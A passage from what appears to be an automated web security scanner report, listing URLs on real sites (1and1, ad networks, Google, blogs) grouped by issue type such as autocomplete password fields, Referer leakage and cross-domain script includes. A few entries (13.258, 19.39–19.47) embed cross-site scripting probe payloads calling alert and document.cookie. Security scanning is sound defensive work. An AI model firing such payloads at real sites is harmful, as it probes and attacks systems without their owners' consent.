13.145. http://order.1and1.com/xml/order/FeatureDomainPdr

13.146. http://order.1and1.com/xml/order/FeatureDomainPdr

13.147. http://order.1and1.com/xml/order/FeatureDreamweaver

13.148. http://order.1and1.com/xml/order/FeatureDreamweaver

13.149. http://order.1and1.com/xml/order/FeatureEmailEmail

13.150. http://order.1and1.com/xml/order/FeatureEmailEmail

13.151. http://order.1and1.com/xml/order/FeatureEmailVirusscan

13.152. http://order.1and1.com/xml/order/FeatureEmailVirusscan

13.153. http://order.1and1.com/xml/order/FeatureEmailWebmail

13.154. http://order.1and1.com/xml/order/FeatureEmailWebmail

13.155. http://order.1and1.com/xml/order/FeatureFtpBackup

13.156. http://order.1and1.com/xml/order/FeatureFtpBackup

13.157. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

13.158. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

13.159. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

13.160. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

13.161. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

13.162. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

13.163. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

13.164. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

13.165. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

13.166. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

13.167. http://order.1and1.com/xml/order/FeatureParallelsPlesk

13.168. http://order.1and1.com/xml/order/FeatureParallelsPlesk

13.169. http://order.1and1.com/xml/order/FeatureParallelsSB

13.170. http://order.1and1.com/xml/order/FeatureParallelsSB

13.171. http://order.1and1.com/xml/order/FeatureSecurityCertificate

13.172. http://order.1and1.com/xml/order/FeatureSecurityCertificate

13.173. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

13.174. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

13.175. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

13.176. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

13.177. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

13.178. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

13.179. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

13.180. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

13.181. http://order.1and1.com/xml/order/FeatureServerFirewall

13.182. http://order.1and1.com/xml/order/FeatureServerFirewall

13.183. http://order.1and1.com/xml/order/FeatureServerHarddrive

13.184. http://order.1and1.com/xml/order/FeatureServerMonitoring

13.185. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

13.186. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

13.187. http://order.1and1.com/xml/order/FeatureServerProcessor

13.188. http://order.1and1.com/xml/order/FeatureServerProcessor

13.189. http://order.1and1.com/xml/order/FeatureServerRecovery

13.190. http://order.1and1.com/xml/order/FeatureServerRecovery

13.191. http://order.1and1.com/xml/order/FeatureServerSsl

13.192. http://order.1and1.com/xml/order/FeatureServerSsl

13.193. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux

13.194. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows

13.195. http://order.1and1.com/xml/order/FeatureSite-buildingAsp

13.196. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

13.197. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

13.198. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

13.199. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

13.200. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

13.201. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

13.202. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

13.203. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

13.204. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

13.205. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

13.206. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

13.207. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

13.208. http://order.1and1.com/xml/order/FeatureSite-buildingElements

13.209. http://order.1and1.com/xml/order/FeatureSite-buildingElements

13.210. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

13.211. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

13.212. http://order.1and1.com/xml/order/FeatureSite-buildingMap

13.213. http://order.1and1.com/xml/order/FeatureSite-buildingMap

13.214. http://order.1and1.com/xml/order/FeatureSite-buildingNet

13.215. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

13.216. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

13.217. http://order.1and1.com/xml/order/FeatureSite-buildingRss

13.218. http://order.1and1.com/xml/order/FeatureSite-buildingRss

13.219. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

13.220. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

13.221. http://order.1and1.com/xml/order/FeatureToolsRatepoint

13.222. http://order.1and1.com/xml/order/FeatureToolsRatepoint

13.223. http://order.1and1.com/xml/order/FeatureWebdesignIstock

13.224. http://order.1and1.com/xml/order/FeatureWebdesignIstock

13.225. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

13.226. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

13.227. http://order.1and1.com/xml/order/FirstWebsite

13.228. http://order.1and1.com/xml/order/FirstWebsite

13.229. http://order.1and1.com/xml/order/Gtc

13.230. http://order.1and1.com/xml/order/Gtc

13.231. http://order.1and1.com/xml/order/History

13.232. http://order.1and1.com/xml/order/History

13.233. http://order.1and1.com/xml/order/Home

13.234. http://order.1and1.com/xml/order/Home

13.235. http://order.1and1.com/xml/order/Hosting

13.236. http://order.1and1.com/xml/order/Hosting

13.237. http://order.1and1.com/xml/order/Instant

13.238. http://order.1and1.com/xml/order/Instant

13.239. http://order.1and1.com/xml/order/International

13.240. http://order.1and1.com/xml/order/International

13.241. http://order.1and1.com/xml/order/Jumpto

13.242. http://order.1and1.com/xml/order/Jumpto

13.243. http://order.1and1.com/xml/order/LocalSubmission

13.244. http://order.1and1.com/xml/order/LocalSubmission

13.245. http://order.1and1.com/xml/order/Mail

13.246. http://order.1and1.com/xml/order/Mail

13.247. http://order.1and1.com/xml/order/MailInstantMail

13.248. http://order.1and1.com/xml/order/MailInstantMail

13.249. http://order.1and1.com/xml/order/MailXchange

13.250. http://order.1and1.com/xml/order/MailXchange

13.251. http://order.1and1.com/xml/order/MicrosoftExchange

13.252. http://order.1and1.com/xml/order/MicrosoftExchange

13.253. http://order.1and1.com/xml/order/Mission

13.254. http://order.1and1.com/xml/order/Mission

13.255. http://order.1and1.com/xml/order/Moneyback

13.256. http://order.1and1.com/xml/order/Moneyback

13.257. http://order.1and1.com/xml/order/MsHosting

13.258. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

13.259. http://order.1and1.com/xml/order/Mshosting

13.260. http://order.1and1.com/xml/order/News

13.261. http://order.1and1.com/xml/order/News

13.262. http://order.1and1.com/xml/order/PrivacyPolicy

13.263. http://order.1and1.com/xml/order/PrivacyPolicy

13.264. http://order.1and1.com/xml/order/Server

13.265. http://order.1and1.com/xml/order/Server

13.266. http://order.1and1.com/xml/order/ServerPremium

13.267. http://order.1and1.com/xml/order/ServerPremium

13.268. http://order.1and1.com/xml/order/ServerPremiumDodekaCore

13.269. http://order.1and1.com/xml/order/ServerPremiumDualCoreM

13.270. http://order.1and1.com/xml/order/ServerPremiumDualCoreXL

13.271. http://order.1and1.com/xml/order/ServerPremiumHexaCore3XL

13.272. http://order.1and1.com/xml/order/ServerPremiumHexaCoreL

13.273. http://order.1and1.com/xml/order/ServerPremiumHexaCoreXL

13.274. http://order.1and1.com/xml/order/ServerPremiumHexaCoreXXL

13.275. http://order.1and1.com/xml/order/ServerPremiumQuadCoreL

13.276. http://order.1and1.com/xml/order/ServerPremiumQuadCoreXL

13.277. http://order.1and1.com/xml/order/Service

13.278. http://order.1and1.com/xml/order/Service

13.279. http://order.1and1.com/xml/order/Sharepoint

13.280. http://order.1and1.com/xml/order/Sharepoint

13.281. http://order.1and1.com/xml/order/StrategicPartners

13.282. http://order.1and1.com/xml/order/StrategicPartners

13.283. http://order.1and1.com/xml/order/SubpoenaPolicy

13.284. http://order.1and1.com/xml/order/TcMicrosoft

13.285. http://order.1and1.com/xml/order/TcMoneyback

13.286. http://order.1and1.com/xml/order/TcPdr

13.287. http://order.1and1.com/xml/order/TcRootserver

13.288. http://order.1and1.com/xml/order/TcSearchAdvertisingOffer

13.289. http://order.1and1.com/xml/order/TcSpecialOffers

13.290. http://order.1and1.com/xml/order/TcSpecialOffers

13.291. http://order.1and1.com/xml/order/TcVps

13.292. http://order.1and1.com/xml/order/TellAFriend

13.293. http://order.1and1.com/xml/order/TellAFriend

13.294. http://order.1and1.com/xml/order/VirtualServer

13.295. http://order.1and1.com/xml/order/VirtualServer

13.296. http://order.1and1.com/xml/order/VirtualServerL

13.297. http://order.1and1.com/xml/order/VirtualServerL

13.298. http://order.1and1.com/xml/order/VirtualServerXL

13.299. http://order.1and1.com/xml/order/VirtualServerXXL

13.300. http://order.1and1.com/xml/order/WhyOneandone

13.301. http://order.1and1.com/xml/order/WhyOneandone

13.302. http://order.1and1.com/xml/order/a

13.303. http://order.1and1.com/xml/order/addon

13.304. http://order.1and1.com/xml/order/costs

13.305. http://order.1and1.com/xml/order/domaincheck

13.306. http://order.1and1.com/xml/order/domaincheck

13.307. http://order.1and1.com/xml/order/eshopupselling

13.308. http://order.1and1.com/xml/order/eshopupselling

13.309. http://order.1and1.com/xml/order/popupDomainPrices

13.310. http://order.1and1.com/xml/order/popupDomainPrices

13.311. http://order.1and1.com/xml/order/popupGreenPower

13.312. http://order.1and1.com/xml/order/popupGreenPower

13.313. http://order.1and1.com/xml/order/popupNetviewer

13.314. http://order.1and1.com/xml/order/popupNetviewer

13.315. http://order.1and1.com/xml/order/popupPayPalInfo

13.316. http://order.1and1.com/xml/order/popupPayPalInfo

13.317. http://order.1and1.com/xml/order/popupServerOsCds

13.318. http://order.1and1.com/xml/order/popupServerOsCds

13.319. http://order.1and1.com/xml/order/popupServerOsVps

13.320. http://order.1and1.com/xml/order/popupTcGoogleAdwords

13.321. http://order.1and1.com/xml/order/popupTcGoogleAdwords

13.322. http://order.1and1.com/xml/order/popupWebsiteMagazine

13.323. http://order.1and1.com/xml/order/popupWebsiteMagazine

13.324. http://order.1and1.com/xml/order/sitedesign

13.325. http://order.1and1.com/xml/order/sitedesign

13.326. http://order.1and1.com/xml/order/tariffselect

13.327. http://order.1and1.com/xml/order/tariffselect

13.328. https://order.1and1.com/xml/order/AboutUs

13.329. https://order.1and1.com/xml/order/CloudDynamicServer

13.330. https://order.1and1.com/xml/order/DomaininfoMove

13.331. https://order.1and1.com/xml/order/Eshops

13.332. https://order.1and1.com/xml/order/Gtc

13.333. https://order.1and1.com/xml/order/Home

13.334. https://order.1and1.com/xml/order/Hosting

13.335. https://order.1and1.com/xml/order/Instant

13.336. https://order.1and1.com/xml/order/Jumpto

13.337. https://order.1and1.com/xml/order/Jumpto

13.338. https://order.1and1.com/xml/order/LocalSubmission

13.339. https://order.1and1.com/xml/order/Mail

13.340. https://order.1and1.com/xml/order/MailInstantMail

13.341. https://order.1and1.com/xml/order/MailXchange

13.342. https://order.1and1.com/xml/order/MicrosoftExchange

13.343. https://order.1and1.com/xml/order/MsHosting

13.344. https://order.1and1.com/xml/order/PrivacyPolicy

13.345. https://order.1and1.com/xml/order/Server

13.346. https://order.1and1.com/xml/order/ServerPremium

13.347. https://order.1and1.com/xml/order/Sharepoint

13.348. https://order.1and1.com/xml/order/TellAFriend

13.349. https://order.1and1.com/xml/order/VirtualServer

13.350. https://order.1and1.com/xml/order/addon

13.351. https://order.1and1.com/xml/order/addon

13.352. https://order.1and1.com/xml/order/costs

13.353. https://order.1and1.com/xml/order/costs

13.354. https://order.1and1.com/xml/order/domaincheck

13.355. https://order.1and1.com/xml/order/domaincheck

13.356. https://order.1and1.com/xml/order/popupBillingCycle

13.357. https://order.1and1.com/xml/order/popupDomainPrices

13.358. https://order.1and1.com/xml/order/popupInternationalCustomers

13.359. https://order.1and1.com/xml/order/popupSymantec

13.360. https://order.1and1.com/xml/order/terms

13.361. http://pixel.33across.com/ps/

13.362. http://pixel.rubiconproject.com/tap.php

13.363. http://pixelbox.uimserv.net/cgi-bin/gmx/CP/264

13.364. http://pixelbox.uimserv.net/cgi-bin/webde/CP/264

13.365. http://r.turn.com/r/beacon

13.366. http://rover.ebay.com/ar/1/73344/4

13.367. http://s46.sitemeter.com/js/counter.asp

13.368. http://safebrowsing.clients.google.com/safebrowsing/downloads

13.369. http://safebrowsing.clients.google.com/safebrowsing/gethash

13.370. http://shots.snap.com/snap_shots.js

13.371. http://stats.united-domains.de/cnt.php

13.372. http://t.invitemedia.com/track_imp

13.373. http://tags.bluekai.com/site/3085

13.374. http://tags.bluekai.com/site/357

13.375. http://techie-buzz.com/wp-content/plugins/cookies-for-comments/css.php

13.376. http://tracking.dc-storm.com/xdom/readcook.ashx

13.377. http://tracking.dc-storm.com/xdom/savecook.aspx

13.378. http://translate.google.com/translate_a/element.js

13.379. http://translate.googleapis.com/translate_a/l

13.380. http://va.px.invitemedia.com/pixel

13.381. http://vark.com/web_questions

13.382. http://vt.imiclk.com/cgi/vtc.cgi

13.383. http://vt.imiclk.com/cgi/vtc.cgi

13.384. http://wa.ui-portal.de/webde/webde-s/s

13.385. http://webdessl.ivwbox.de/blank.gif

13.386. http://webdessl.ivwbox.de/cgi-bin/ivw/CP/264

13.387. http://wpeve.com/

13.388. http://www.alexa.com/site/clickstream

13.389. http://www.alexa.com/site/trafficstats

13.390. http://www.burstbeacon.com/view/90916/12285/177733/308557/3000/3111E3FF/16lnk0k1bqnmuj/

13.391. http://www.burstbeacon.com/view/90916/12285/177733/308561/3000/FF64E799/16lnk0k1bqnmuj/

13.392. http://www.burstbeacon.com/view/90916/27881/176307/305392/3000/1791BAA1/16lnk0k1bqnmuj/

13.393. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/sz=0X0MN/v=1.1Y/RANDOM_NUMBER/RETURN-CODE/JS/

13.394. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/sz=0X0MN/v=1.1Y/RANDOM_NUMBER/RETURN-CODE/JS/

13.395. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/16763/NF/RETURN-CODE/JS/

13.396. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/2019/NF/RETURN-CODE/JS/

13.397. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/28640/NF/RETURN-CODE/JS/

13.398. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/28649/NF/RETURN-CODE/JS/

13.399. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/3518/NF/RETURN-CODE/JS/

13.400. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/52837/NF/RETURN-CODE/JS/

13.401. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=120x600A%7C160x600A/55742/NF/RETURN-CODE/JS/

13.402. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=300X250A%7C300x600A/44641/RETURN-CODE/JS/

13.403. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=300X250A%7C300x600A/87921/NF/RETURN-CODE/JS/

13.404. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=300X250A%7C300x600A/94532/RETURN-CODE/JS/

13.405. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=728x90A/13568/NI/NF/RETURN-CODE/JS/

13.406. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=728x90A/19238/NI/NF/RETURN-CODE/JS/

13.407. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=728x90A/68204/NI/NF/RETURN-CODE/JS/

13.408. http://www.burstnet.com/enlightn/4623//042A/

13.409. http://www.google.com/gen_204

13.410. http://www.google.com/mbd

13.411. http://www.google.com/realtimejs

13.412. http://www.google.com/realtimepts

13.413. http://www.google.com/search

13.414. http://www.projecthoneypot.org/about_us.php

13.415. http://www.projecthoneypot.org/account_login.php

13.416. http://www.projecthoneypot.org/contact_us.php

13.417. http://www.projecthoneypot.org/index.php

13.418. http://www.projecthoneypot.org/ip_65.49.2.27

13.419. http://www.s2d6.com/x/

13.420. http://www.topwebhosts.org/

13.421. http://www.united-internet.de/

13.422. http://www.unspam.com/

13.423. http://www.unspam.com/projects.html

13.424. http://www.unspam.com/services.html

13.425. http://www.wilderssecurity.com/showthread.php

14. Password field with autocomplete enabled

14.1. http://developer.quova.com/member/register

14.2. https://extranet.quova.com/Portal/user/Home.view

14.3. http://www.gmx.net/

14.4. http://www.gmx.net/

14.5. http://www.gmx.net/

14.6. https://www.port80software.com/myport80/

14.7. http://www.projecthoneypot.org/account_login.php

14.8. http://www.united-domains.de/

14.9. http://www.web.de/

14.10. http://www.web.de/

14.11. http://www.wilderssecurity.com/showthread.php

15. Source code disclosure

15.1. http://platform.linkedin.com/js/anonymousFramework

15.2. http://www.google.com/support/chrome/bin/resource/js_minified.js

15.3. http://www.google.com/support/forum/resource/release-1883697887.js

15.4. http://www.google.com/support/toolbar/bin/resource/js_minified.js

16. Referer-dependent response

16.1. http://a.tribalfusion.com/p.media/abmOQK1UJ90aynSr3HUrB0WtFUmb7rRUvrYqQt3TZbh4qrYmEMAYbjbUHfVoPfJmGnooWvJ3EMf3tes3A7ZdmFUZcYcrTYGZbV0cfNpTF42bQRTFfZcWAYWQTb2SsQMQdZbxYt7qVP3u2GB3XbBIU6qr5mUeRmfF3tBMXHJJmdAo3938fIhilL/2448066/adTag.html

16.2. http://ad.epochtimes.com/s1/adframe.php

16.3. http://ad.epochtimes.com/s1/www/delivery/afr.php

16.4. http://ad.yieldmanager.com/imp

16.5. http://api.twitter.com/1/statuses/user_timeline.json

16.6. http://shots.snap.com/asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js

16.7. http://wpeve.com/

16.8. http://www.facebook.com/plugins/like.php

16.9. http://www.facebook.com/plugins/likebox.php

16.10. http://www.facebook.com/plugins/recommendations.php

16.11. http://www.youtube.com/p/32DC0C535B949156&hl=en_US&fs=1%26enablejsapi=1%26playerapiid=toolbar_channel

16.12. http://www.youtube.com/v/WRqe8lgFCiM&hl=en_US&fs=1&

16.13. http://www.youtube.com/v/mWT3x6hYvk0&hl=en&rel=0&autoplay=1

17. Cross-domain POST

17.1. http://saratogaindecline.blogspot.com/2010/03/nxivm-madness.html

17.2. http://saratogaindecline.blogspot.com/2011/02/transparency-and-nxivm.html

17.3. http://www.web.de/

17.4. http://www.web.de/

18. Cross-domain Referer leakage

18.1. http://a.tribalfusion.com/j.ad

18.2. http://a.tribalfusion.com/j.ad

18.3. http://a.tribalfusion.com/j.ad

18.4. http://a.tribalfusion.com/j.ad

18.5. http://a.tribalfusion.com/j.ad

18.6. http://a.tribalfusion.com/j.ad

18.7. http://a.tribalfusion.com/j.ad

18.8. http://ad.adtegrity.net/st

18.9. http://ad.doubleclick.net/adi/N2434.burst/B5133480.17

18.10. http://ad.doubleclick.net/adi/N2434.burst/B5133480.17

18.11. http://ad.doubleclick.net/adi/N2434.burst/B5133480.19

18.12. http://ad.doubleclick.net/adi/N2434.burst/B5133480.19

18.13. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43

18.14. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43

18.15. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.2

18.16. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.2

18.17. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.4

18.18. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.8

18.19. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.8

18.20. http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.4

18.21. http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5

18.22. http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5

18.23. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21

18.24. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155

18.25. http://ad.doubleclick.net/adj/N3340.trfu/B5234881.4

18.26. http://ad.doubleclick.net/adj/N5554.acerno.com/B5224009.7

18.27. http://ad.epochtimes.com/s1/adframe.php

18.28. http://ad.epochtimes.com/s1/www/delivery/afr.php

18.29. http://ad.yieldmanager.com/iframe3

18.30. http://ad.yieldmanager.com/iframe3

18.31. http://ad.yieldmanager.com/iframe3

18.32. http://ad.yieldmanager.com/imp

18.33. http://adopt.imiclk.com/emb/q

18.34. http://adopt.imiclk.com/emb/q

18.35. http://ads1.tyroo.com/addyn/3.0/1067/3134846/0/170/ADTECH

18.36. http://blog.vark.com/

18.37. http://creativeproxy.uimserv.net/

18.38. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js

18.39. http://dg.specificclick.net/

18.40. http://fls.doubleclick.net/activityi

18.41. http://googleads.g.doubleclick.net/pagead/ads

18.42. http://googleads.g.doubleclick.net/pagead/ads

18.43. http://googleads.g.doubleclick.net/pagead/ads

18.44. http://googleads.g.doubleclick.net/pagead/ads

18.45. http://googleads.g.doubleclick.net/pagead/ads

18.46. http://googleads.g.doubleclick.net/pagead/ads

18.47. http://googleads.g.doubleclick.net/pagead/ads

18.48. http://googleads.g.doubleclick.net/pagead/ads

18.49. http://googleads.g.doubleclick.net/pagead/ads

18.50. http://googleads.g.doubleclick.net/pagead/ads

18.51. http://googleads.g.doubleclick.net/pagead/ads

18.52. http://googleads.g.doubleclick.net/pagead/ads

18.53. http://googleads.g.doubleclick.net/pagead/ads

18.54. http://googleads.g.doubleclick.net/pagead/ads

18.55. http://googleads.g.doubleclick.net/pagead/ads

18.56. http://googleads.g.doubleclick.net/pagead/ads

18.57. http://googleads.g.doubleclick.net/pagead/ads

18.58. http://hp.gmx.uimserv.net/

18.59. http://ib.adnxs.com/tt

18.60. http://img.mediaplex.com/content/0/707/52222/44909_GEN09Products1_ebay_300x250.html

18.61. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware

18.62. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr

18.63. http://order.1and1.com/links/

18.64. http://order.1and1.com/xml/order/CloudDynamicServer

18.65. http://order.1and1.com/xml/order/Eshops

18.66. http://order.1and1.com/xml/order/FeatureSite-buildingMap

18.67. http://order.1and1.com/xml/order/Home

18.68. http://order.1and1.com/xml/order/Hosting

18.69. http://order.1and1.com/xml/order/Instant

18.70. http://order.1and1.com/xml/order/LocalSubmission

18.71. http://order.1and1.com/xml/order/Mail

18.72. http://order.1and1.com/xml/order/MailInstantMail

18.73. http://order.1and1.com/xml/order/MailXchange

18.74. http://order.1and1.com/xml/order/MicrosoftExchange

18.75. http://order.1and1.com/xml/order/MsHosting

18.76. http://order.1and1.com/xml/order/Server

18.77. http://order.1and1.com/xml/order/ServerPremium

18.78. http://order.1and1.com/xml/order/Sharepoint

18.79. http://order.1and1.com/xml/order/VirtualServer

18.80. http://order.1and1.com/xml/order/VirtualServerL

18.81. http://order.1and1.com/xml/order/eshopupselling

18.82. https://order.1and1.com/xml/order/addon

18.83. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr

18.84. http://seg.sharethis.com/getSegment.php

18.85. http://siteexplorer.search.yahoo.com/search

18.86. http://siteexplorer.search.yahoo.com/search

18.87. http://techie-buzz.com/

18.88. http://techie-buzz.com/about-us

18.89. http://techie-buzz.com/top-posts

18.90. http://unitedinternet.de/

18.91. http://webcache.googleusercontent.com/search

18.92. http://webcache.googleusercontent.com/search

18.93. http://wpeve.com/

18.94. http://www.alexa.com/site/trafficstats

18.95. http://www.facebook.com/plugins/like.php

18.96. http://www.facebook.com/plugins/likebox.php

18.97. http://www.facebook.com/plugins/likebox.php

18.98. http://www.facebook.com/plugins/likebox.php

18.99. http://www.facebook.com/plugins/recommendations.php

18.100. http://www.facebook.com/plugins/recommendations.php

18.101. http://www.facebook.com/plugins/recommendations.php

18.102. http://www.google.com/search

18.103. http://www.google.com/search

18.104. http://www.google.com/search

18.105. http://www.google.com/support/chrome/

18.106. http://www.google.com/support/chrome/bin/search.py

18.107. http://www.google.com/support/forum/p/Chrome/thread

18.108. http://www.google.com/support/forum/resource/release-1883697887.js

18.109. http://www.google.com/support/toolbar/bin/answer.py

18.110. http://www.google.com/support/toolbar/bin/request.py

18.111. http://www.google.com/url

18.112. http://www.google.com/url

18.113. http://www.google.com/url

18.114. http://www.google.com/url

18.115. http://www.google.com/url

18.116. http://www.google.com/url

18.117. http://www.google.com/url

18.118. http://www.google.com/url

18.119. http://www.google.com/url

18.120. http://www.phoenixads.co.in/delivery/ads.asp

18.121. http://www.phoenixads.co.in/delivery/ads.asp

18.122. http://www.phoenixads.co.in/delivery/ads.asp

18.123. http://www.projecthoneypot.org/contact_us.php

18.124. http://www.topwebhosts.org/tools/ip-locator.php

18.125. http://www.united-internet.de/

18.126. http://www.united-internet.de/ImprintHeadquarter

18.127. http://www.unspam.com/projects.html

18.128. http://www.unspam.com/services.html

18.129. http://www.wilderssecurity.com/showthread.php

19. Cross-domain script include

19.1. http://a.tribalfusion.com/j.ad

19.2. http://a.tribalfusion.com/j.ad

19.3. http://a.tribalfusion.com/p.media/abmOQK1UJ90aynSr3HUrB0WtFUmb7rRUvrYqQt3TZbh4qrYmEMAYbjbUHfVoPfJmGnooWvJ3EMf3tes3A7ZdmFUZcYcrTYGZbV0cfNpTF42bQRTFfZcWAYWQTb2SsQMQdZbxYt7qVP3u2GB3XbBIU6qr5mUeRmfF3tBMXHJJmdAo3938fIhilL/2448066/adTag.html

19.4. http://ad.doubleclick.net/adi/N2434.burst/B5133480.17

19.5. http://ad.doubleclick.net/adi/N2434.burst/B5133480.19

19.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43

19.7. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.2

19.8. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.4

19.9. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.8

19.10. http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.4

19.11. http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5

19.12. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21

19.13. http://ad.epochtimes.com/s1/adframe.php

19.14. http://ad.epochtimes.com/s1/www/delivery/afr.php

19.15. http://ad.yieldmanager.com/iframe3

19.16. http://ad.yieldmanager.com/iframe3

19.17. http://ad.yieldmanager.com/iframe3

19.18. http://adopt.imiclk.com/emb/q

19.19. http://adopt.imiclk.com/emb/q

19.20. http://blog.vark.com/

19.21. http://cache.techie-buzz.com/ads/120_sidebar_filler.html

19.22. http://cache.techie-buzz.com/ads/160_banner_filler.html

19.23. http://cache.techie-buzz.com/ads/300_1_filler.html

19.24. http://cache.techie-buzz.com/ads/top_468_filler.html

19.25. http://cache.techie-buzz.com/ads/top_728_filler.html

19.26. http://cdn5.tribalfusion.com/media/1956006/frame.html

19.27. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js

19.28. http://developer.quova.com/

19.29. http://developer.quova.com/member/register

19.30. http://dnstree.com/cx/xss/

19.31. http://epochtimes.com/

19.32. http://googleads.g.doubleclick.net/pagead/ads

19.33. http://googleads.g.doubleclick.net/pagead/ads

19.34. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware

19.35. http://saratogaindecline.blogspot.com/2010/03/nxivm-madness.html

19.36. http://saratogaindecline.blogspot.com/2011/02/transparency-and-nxivm.html

19.37. http://seg.sharethis.com/getSegment.php

19.38. http://seo101.co/xss.cx

19.39. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css

19.40. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico

19.41. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png

19.42. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif

19.43. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png

19.44. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png

19.45. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg

19.46. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js

19.47. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/scripts.js

19.48. http://serverinsiders.com/domain/epochtimes-com.html

19.49. http://serverinsiders.com/ip/72.52.81.107.html

